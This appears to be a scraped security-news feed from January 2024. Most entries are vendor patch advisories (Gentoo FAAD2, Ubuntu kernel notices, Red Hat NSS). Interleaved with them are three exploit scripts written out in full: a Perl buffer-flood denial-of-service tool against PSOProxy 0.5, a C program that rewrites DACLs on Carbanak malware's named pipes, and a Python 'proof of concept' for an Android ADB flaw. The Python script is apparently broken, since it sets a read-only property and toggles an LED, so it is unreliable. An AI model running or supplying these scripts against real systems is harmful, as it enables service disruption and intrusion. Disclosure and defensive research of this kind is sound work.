Gentoo Linux Security Advisory 202401-13 - Multiple denial of service vulnerabilities have been found in FAAD2. Versions greater than or equal to 2.11.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: FAAD2: Multiple Vulnerabilities  
     Date: January 10, 2024  
     Bugs: #918558  
       ID: 202401-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple denial of service vulnerabilities have been found in FAAD2.

Background  
==========

FAAD2 is an open source MPEG-4 and MPEG-2 AAC decoder.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
media-libs/faad2  < 2.11.0      >= 2.11.0

Description  
===========

Multiple vulnerabilities have been discovered in FAAD2. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All FAAD2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/faad2-2.11.0"

References  
==========

[ 1 ] CVE-2023-38857  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38857  
[ 2 ] CVE-2023-38858  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38858

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-13

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-13

Proof of concept exploit for a privilege escalation issue in Android. In checkDebuggingDisallowed of DeviceVersionFragment.java, there is a possible way to access adb before SUW completion due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

    #!/usr/bin/env pythonimport subprocess# Connect to the device via ADBsubprocess.run(["adb", "devices"])# Check if the device is in secure USB modedevice = subprocess.run(["adb", "shell", "getprop", "ro.adb.secure"], stdout=subprocess.PIPE)if "1" in device.stdout.decode():    # Secure USB mode is enabled, so we need to disable it    subprocess.run(["adb", "shell", "setprop", "ro.adb.secure", "0"])# Exploit the vulnerability by accessing ADB before SUW completionsubprocess.run(["adb", "shell"])# Escalate privileges by executing commands as the root usersubprocess.run(["adb", "shell", "su", "-c", "echo 0 > /sys/class/leds/led:green: charging/brightness"], check=True)subprocess.run(["adb", "shell", "su", "-c", "echo 100 > /sys/class/leds/led:green: charging/brightness"], check=True)

Android DeviceVersionFragment.java Privilege Escalation

PSOProxy version 0.5 suffers from a denial of service vulnerability.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: PSOProxy 0.5 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 10 january 2024  
# Vendor Homepage:  https://sourceforge.net/projects/psoproxy/files/psoproxy/0.5/  
# Download to demo: https://drive.google.com/file/d/1GC2GWGOx9Z1vWT_mxnGXHuTptuHa7lIp/view?usp=sharing  
# Download to demo 2: https://drive.google.com/file/d/1DHQ1sZL3mqlqFWn50eq7FLVtzX3E6qgC/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: PSOProxy 0.5  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=0uuUqfpRbHM

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to web server.  
#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

my $i=0;  
    print "\t    ==> Exploiting... \n\n";  
while ($i <= 9) {  
    my $sock = IO::Socket::INET->new(  
        PeerAddr => $ip,  
        PeerPort => $port,  
        Proto    => 'tcp',  
    ) or die "Cannot connect to $ip:$port: $!\n";

    my $buffer = "A" x 3000;  
    my $shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .  
                    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

        $buffer .= "\x0F\x98\xF8\x77" . $shellcode;

    print $sock $buffer . "\r\n";  
    close($sock);

        $i++;  
}

  print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

                              ,--,  
                       _ ___/ /\|  
                   ,;'( )__, )  ~  
                  //  //   '--;   
                  '   \     | ^  
                       ^    ^

      [+] PSOProxy 0.5 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

PSOProxy 0.5 Denial Of Service

Ubuntu Security Notice 6573-1 - Lucas Leong discovered that the netfilter subsystem in the Linux kernel did not properly validate some attributes passed from userspace. A local attacker could use this to cause a denial of service or possibly expose sensitive information. Kyle Zeng discovered that the IPv4 implementation in the Linux kernel did not properly handle socket buffers when performing IP routing in certain circumstances, leading to a null pointer dereference vulnerability. A privileged attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6573-1January 09, 2024linux-azure vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10Summary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:Lucas Leong discovered that the netfilter subsystem in the Linux kernel didnot properly validate some attributes passed from userspace. A localattacker could use this to cause a denial of service (system crash) orpossibly expose sensitive information (kernel memory). (CVE-2023-39189)Kyle Zeng discovered that the IPv4 implementation in the Linux kernel didnot properly handle socket buffers (skb) when performing IP routing incertain circumstances, leading to a null pointer dereference vulnerability.A privileged attacker could use this to cause a denial of service (systemcrash). (CVE-2023-42754)Yikebaer Aizezi discovered that the ext4 file system implementation in theLinux kernel contained a use-after-free vulnerability when handling inodeextent metadata. An attacker could use this to construct a malicious ext4file system image that, when mounted, could cause a denial of service(system crash). (CVE-2023-45898)Jason Wang discovered that the virtio ring implementation in the Linuxkernel did not properly handle iov buffers in some situations. A localattacker in a guest VM could use this to cause a denial of service (hostsystem crash). (CVE-2023-5158)Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kerneldid not properly handle queue initialization failures in certainsituations, leading to a use-after-free vulnerability. A remote attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2023-5178)Budimir Markovic discovered that the perf subsystem in the Linux kernel didnot properly handle event groups, leading to an out-of-bounds writevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-5717)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   linux-image-6.5.0-1010-azure    6.5.0-1010.10   linux-image-6.5.0-1010-azure-fde  6.5.0-1010.10   linux-image-azure               6.5.0.1010.12   linux-image-azure-fde           6.5.0.1010.12After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6573-1   CVE-2023-39189, CVE-2023-42754, CVE-2023-45898, CVE-2023-5158,   CVE-2023-5178, CVE-2023-5717Package Information:   https://launchpad.net/ubuntu/+source/linux-azure/6.5.0-1010.10

Ubuntu Security Notice USN-6573-1

Ubuntu Security Notice 6572-1 - Yu Hao discovered that the UBI driver in the Linux kernel did not properly check for MTD with zero erasesize during device attachment. A local privileged attacker could use this to cause a denial of service. Bien Pham discovered that the netfiler subsystem in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. A local user could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6572-1  
January 09, 2024

linux-azure vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure: Linux kernel for Microsoft Azure Cloud systems

Details:

Yu Hao discovered that the UBI driver in the Linux kernel did not properly  
check for MTD with zero erasesize during device attachment. A local  
privileged attacker could use this to cause a denial of service (system  
crash). (CVE-2023-31085)

Bien Pham discovered that the netfiler subsystem in the Linux kernel  
contained a race condition, leading to a use-after-free vulnerability. A  
local user could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-4244)

Maxim Levitsky discovered that the KVM nested virtualization (SVM)  
implementation for AMD processors in the Linux kernel did not properly  
handle x2AVIC MSRs. An attacker in a guest VM could use this to cause a  
denial of service (host kernel crash). (CVE-2023-5090)

It was discovered that the SMB network file sharing protocol implementation  
in the Linux kernel did not properly handle certain error conditions,  
leading to a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-5345)

Murray McAllister discovered that the VMware Virtual GPU DRM driver in the  
Linux kernel did not properly handle memory objects when storing surfaces,  
leading to a use-after-free vulnerability. A local attacker in a guest VM  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-5633)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   linux-image-6.5.0-1009-azure    6.5.0-1009.9  
   linux-image-6.5.0-1009-azure-fde  6.5.0-1009.9  
   linux-image-azure               6.5.0.1009.11  
   linux-image-azure-fde           6.5.0.1009.11

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6572-1  
   CVE-2023-31085, CVE-2023-4244, CVE-2023-5090, CVE-2023-5345,  
   CVE-2023-5633

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-azure/6.5.0-1009.9

Ubuntu Security Notice USN-6572-1

Backdoor.Win32 Carbanak (Anunak) malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b8e1e5b832e5947f41fd6ae6ef6d09a1.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32 Carbanak (Anunak)Vulnerability: Named Pipe Null DACLFamily: CarbanakType: PE32MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1Vuln ID: MVID-2024-0667Dropped files: AlhEXlUJ.exe, AlhEXlUJbVpfX1EMVw.binDisclosure: 01/09/2024Description: Carbanak malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.Low privileged users can modify the pipes DACLs, removing rights for Everyone denying access to all users. First 6 pipes are created by its parent processand last 2 by the child process. The pipes names are randomly generated each time it is run all except for one JFNfVUYDXmlZQV.Therefore, we can detect Carbanak by that one pipe, as the "JFNfVUYDXmlZQVI" pipe is always created regardless of other randomly named pipes.Listing Carbanaks named pipes they get grouped as they are created at same time with 2 of them listed prior to the JFNfVUYDXmlZQVI pipe.Carbanak creates a directory named "Mozilla" under ProgramData with hidden files, one of which is AlhEXlUJ.exe used by the service it creates which runs as SYSTEM. The malwares service names created seem to use an already existing service name and add "Sys" at the end of its name.Exploitation steps, output all named pipes and look for "JFNfVUYDXmlZQVI" if detected, exploit the DACL on 2 previously listed pipes and 5 pipes listed after.Successfully tested in VM environment.Carbanak IPC Named Pipes:\\.\Pipe\cltjLnYRKKjUESTvgGdmERTb   RW Everyone\\.\Pipe\tGYNSgZvVXwumEhdcF    RW Everyone\\.\Pipe\JFNfVUYDXmlZQVI   <=====  ALWAYS CREATED  RW Everyone\\.\Pipe\PoUXbOHFRuUZAufnlpMZoqdtIfOX  RW Everyone\\.\Pipe\oBcVHguxbnjGbSgkJptifqvNFgD  RW Everyone\\.\Pipe\iDToHxpSCbEIEHPBeQ  RW Everyone\\.\Pipe\YutsGUYwwUusszByeuXUQK  RW Everyone\\.\Pipe\UfnQmAUTVtEkYvMoUWAZekAuWZHe  RW EveryoneExploit/PoC:#include "windows.h"#include "stdio.h"#include "accctrl.h"#include "aclapi.h"/*Carbanak: 48d208b87b29d50bb160f336c94b681e232b0f90e8c02175e593d60737369c13DACL IPC named pipes created and grants RW access for Everyone.We can identify Carbanak as out of the eight pipes it creates with random names the pipenamed JFNfVUYDXmlZQVI is always created. Pipes are typically grouped as they are createdat same time and typically 2 are previous to pipe JFNfVUYDXmlZQVI and others are created afterOutput named pipes find JFNfVUYDXmlZQVI and exploit DACL on 2 previous and 5 after.Successfully tested in VM environment.By Malvuln**//** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**/#define CARBANAK_PIPE "JFNfVUYDXmlZQVI"#define MAX_TOKENS 1024#define DELIMITER "\n"int str2Array(char*** argv, char *str);int Exploit(char *carbanak_pipe);int str2Array(char*** argv, char *str){char* buffer;int argc;buffer = (char *) malloc(strlen(str) * sizeof(char));strcpy(buffer, str);(*argv) = (char**) malloc(MAX_TOKENS * sizeof(char**));  argc = 0;    (*argv)[argc++] = strtok(buffer, DELIMITER);  while ((((*argv)[argc] = strtok(NULL, DELIMITER)) != NULL) &&   (argc < MAX_TOKENS)) ++argc;return argc;}int main(void){system("dir /b \\\\.\\pipe\\\\ > tmp.sys");int ch;char tmp[1];FILE *fp = fopen("tmp.sys", "r");fseek(fp, 0, SEEK_END);int bytes = ftell(fp) + 256;rewind(fp);char x[bytes]; while((ch = fgetc(fp)) != EOF){      if(feof(fp)){      break;     }    sprintf(tmp, "%c", ch);    strcat(x, tmp);}fclose(fp);char **A;int i, result = str2Array(&A, x);int delay = 300;int rc;BOOL infected=FALSE;for(i=0;i<result;i++){    if(strcmp(A[i], CARBANAK_PIPE)==0){    printf("[+] Carbanak (Anunak) malware IPC exploit\n");    printf("[!] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");    printf("[!] Named Pipe %s%s\n", CARBANAK_PIPE, " detected!");    printf("[+] Attack started...\n\n");        infected = TRUE;    Exploit(A[i]);    Sleep(delay);        Exploit(A[i-2]);    Sleep(delay);    Exploit(A[i-1]);    Sleep(delay);     Exploit(A[i+1]);    Sleep(delay);        Exploit(A[i+2]);    Sleep(delay);      Exploit(A[i+3]);    Sleep(delay);      Exploit(A[i+4]);    Sleep(delay);          rc = Exploit(A[i+5]);  }}    if(!infected){       printf("[+] Carbanak (Anunak) malware IPC Exploit \n");     printf("[+] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");     printf("[!] Named Pipe %s%s", CARBANAK_PIPE, " not found on the system.\n");     printf("[!] Aborting...");    }    if(rc==0){      printf("\n[!] Done!");          }  printf("\n[+] By Malvuln circa 2024\n\n");  system("pause");  return 0;}int Exploit(char *malpipe){      char MALPIPE_PREFIX[269] = "\\\\.\\pipe\\";    strcat(MALPIPE_PREFIX, malpipe);    HANDLE hPipe = CreateFileA((LPCSTR)MALPIPE_PREFIX, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, 0, NULL);            PACL pOldDACL = NULL;    PACL pNewDACL = NULL;  if (hPipe == INVALID_HANDLE_VALUE){        int rc = GetLastError();      if(rc==5){       printf("[!] Access Denied for pipe: %s\n", malpipe);       }             return 1;}    if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){     printf("[!] Error: %d",  GetLastError());    return 1;  }      TRUSTEE trustee[1];    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;    trustee[0].ptstrName = TEXT("Everyone");    trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;    trustee[0].pMultipleTrustee = NULL;    EXPLICIT_ACCESS explicit_access_list[1];    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));    explicit_access_list[0].grfAccessMode = DENY_ACCESS;     explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;    explicit_access_list[0].grfInheritance = NO_INHERITANCE;    explicit_access_list[0].Trustee = trustee[0];        if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){       printf("[!] Error: %d",  GetLastError());      return 1;    }          if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){                   printf("[!] Error: %d",  GetLastError());       return 1;           }else{       printf("[+] Modifying IPC Pipe DACL ==> %s\n", MALPIPE_PREFIX);      }        LocalFree(pNewDACL);    LocalFree(pOldDACL);    CloseHandle(hPipe);        return 0;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32 Carbanak (Anunak) MVID-2024-0667 Named Pipe NULL DACL

Ubuntu Security Notice 6548-4 - It was discovered that Spectre-BHB mitigations were missing for Ampere processors. A local attacker could potentially use this to expose sensitive information. It was discovered that the USB subsystem in the Linux kernel contained a race condition while handling device descriptors in certain situations, leading to a out-of-bounds read vulnerability. A local attacker could possibly use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6548-4  
January 09, 2024

linux-gkeop vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems

Details:

It was discovered that Spectre-BHB mitigations were missing for Ampere  
processors. A local attacker could potentially use this to expose sensitive  
information. (CVE-2023-3006)

It was discovered that the USB subsystem in the Linux kernel contained a  
race condition while handling device descriptors in certain situations,  
leading to a out-of-bounds read vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2023-37453)

Lucas Leong discovered that the netfilter subsystem in the Linux kernel did  
not properly validate some attributes passed from userspace. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly expose sensitive information (kernel memory). (CVE-2023-39189)

Sunjoo Park discovered that the netfilter subsystem in the Linux kernel did  
not properly validate u32 packets content, leading to an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-39192)

Lucas Leong discovered that the netfilter subsystem in the Linux kernel did  
not properly validate SCTP data, leading to an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-39193)

Lucas Leong discovered that the Netlink Transformation (XFRM) subsystem in  
the Linux kernel did not properly handle state filters, leading to an out-  
of-bounds read vulnerability. A privileged local attacker could use this to  
cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2023-39194)

Kyle Zeng discovered that the IPv4 implementation in the Linux kernel did  
not properly handle socket buffers (skb) when performing IP routing in  
certain circumstances, leading to a null pointer dereference vulnerability.  
A privileged attacker could use this to cause a denial of service (system  
crash). (CVE-2023-42754)

Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kernel  
did not properly handle queue initialization failures in certain  
situations, leading to a use-after-free vulnerability. A remote attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-5178)

Budimir Markovic discovered that the perf subsystem in the Linux kernel did  
not properly handle event groups, leading to an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-5717)

It was discovered that the TLS subsystem in the Linux kernel did not  
properly perform cryptographic operations in some situations, leading to a  
null pointer dereference vulnerability. A local attacker could use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-6176)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1083-gkeop    5.4.0-1083.87  
   linux-image-gkeop               5.4.0.1083.81  
   linux-image-gkeop-5.4           5.4.0.1083.81

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6548-4  
   https://ubuntu.com/security/notices/USN-6548-1  
   CVE-2023-3006, CVE-2023-37453, CVE-2023-39189, CVE-2023-39192,  
   CVE-2023-39193, CVE-2023-39194, CVE-2023-42754, CVE-2023-5178,  
   CVE-2023-5717, CVE-2023-6176

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1083.87

Ubuntu Security Notice USN-6548-4

Red Hat Security Advisory 2024-0107-03 - An update for nss is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0107.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nss security updateAdvisory ID:        RHSA-2024:0107-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0107Issue date:         2024-01-10Revision:           03CVE Names:          CVE-2023-5388====================================================================Summary: An update for nss is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Network Security Services (NSS) is a set of libraries designed to support the cross-platform development of security-enabled client and server applications.Security Fix(es):* nss: timing attack against RSA decryption (CVE-2023-5388)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5388References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2243644

Red Hat Security Advisory 2024-0107-03

Red Hat Security Advisory 2024-0106-03 - An update for nss is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0106.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nss security updateAdvisory ID:        RHSA-2024:0106-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0106Issue date:         2024-01-10Revision:           03CVE Names:          CVE-2023-5388====================================================================Summary: An update for nss is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Network Security Services (NSS) is a set of libraries designed to support the cross-platform development of security-enabled client and server applications.Security Fix(es):* nss: timing attack against RSA decryption (CVE-2023-5388)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5388References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2243644

Red Hat Security Advisory 2024-0106-03

Red Hat Security Advisory 2024-0105-03 - An update for nss is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0105.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nss security updateAdvisory ID:        RHSA-2024:0105-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0105Issue date:         2024-01-10Revision:           03CVE Names:          CVE-2023-5388====================================================================Summary: An update for nss is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Network Security Services (NSS) is a set of libraries designed to support the cross-platform development of security-enabled client and server applications.Security Fix(es):* nss: timing attack against RSA decryption (CVE-2023-5388)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5388References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2243644

Tag

#vulnerability